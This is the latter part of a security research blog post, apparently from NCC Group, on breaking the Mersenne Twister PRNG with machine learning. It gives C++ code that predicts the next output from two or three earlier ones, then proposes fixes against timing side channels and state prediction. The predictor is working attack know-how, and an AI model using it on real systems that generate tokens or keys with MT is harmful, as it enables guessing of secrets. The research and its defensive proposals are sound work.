0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit in order in the output. Also, we can notice that only 8 bits in the first input affect the same 6 bits in the output. But for the second input, each bit is affecting several bits. Although we can write a closed-form logic expression for this, we would write a code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    r ^= MT_227;
    return r;
}

We have tested this code by using the standard MT library in C to generate the sequence of the random numbers and match the generated numbers from the function with the next generated number from the library. The output was 100% matching for several millions of generated numbers with different seeds.

3.2.4.3 Further Improvement

We have seen in the previous section that we can use three generated numbers to generate the new number in the sequence. But we noticed that we only need 8 bits from the first number, which we XOR, and if the result of the XORing of them is one, we XOR the result with a constant, 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two possible output values, with or without XORing the result with 0x44081102. Here is the code segment for the new function.

#include<tuple>
  
using namespace std;

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r^0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to improve them. Studying those issues can be particularly useful when MT is used as a part of cryptographically-secure PRNG, like in CryptMT. CryptMT uses Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consist of two steps, twisting and tempering. Although the tempering step is applied on each step, the twisting step is only used when we exhaust all the states, and we need to twist the state array to create a new internal state. That is OK, algorithmically, but from the cybersecurity point of view, this is problematic. It makes the algorithm vulnerable to a different type of attack, namely a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number, and when it is much longer, the start of the new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold of 0.4 ms of the generated numbers. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number using the progressive formula we have created earlier. Using this approach, we have updated the code for MT and measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they got the exact sequences. Also, when we evaluated the mean of the runtime of both MT implementations over millions of numbers generated, the new approach is a little more efficient but has a much smaller standard deviation.

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning that can correlate a generated output from MT to three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step on the old state at once and generate the new state from it. This can be achieved by doing the twist step in a new state array and swap the new state with the old one after twisting all the states. This will make the state prediction more complex as different states will use different distances for evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 apart. And all the new states from 227 to 623 will be using the value of the old states from 0 to 396, which are 227 apart. This slight change will generate a more resilient PRNG for the above-suggested attack, as any generated output can be either 227  or 397 away from the output it depends on as we don’t know the position of the generated number (whether it is in the first 227 numbers from the state or in the last 397 ones). Although this will generate a different sequence, the new state’s prediction from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the outcome PRNG, such as periodicity.

5. Conclusion

In this series of posts, we have shared the methodology of cracking two of the well-known (non-cryptographic) Pseudo-Random Number Generators, namely xorshift128 and Mersenne Twister. In the first post, we showed how we could use a simple machine learning model to learn the internal pattern in the sequence of the generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We also showed how to split the problem into two simpler problems, and we trained two different NN models to tackle each problem separately. Then we used the two models together to predict the next sequence number in the sequence using three generated numbers. Also, we have shown how to deep dive into the models and understand how they work internally and how to use them to create a closed-form code that can break the Mersenne Twister (MT) PRNG. At last, we shared two possible techniques to improve the MT algorithm security-wise as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while still recognizing that these changes do not themselves constitute sufficient security improvements for MT to be itself used where cryptographic randomness is required).

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post [3] and the changes that are done in part 1 of this post.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

  • There are no more articles
❌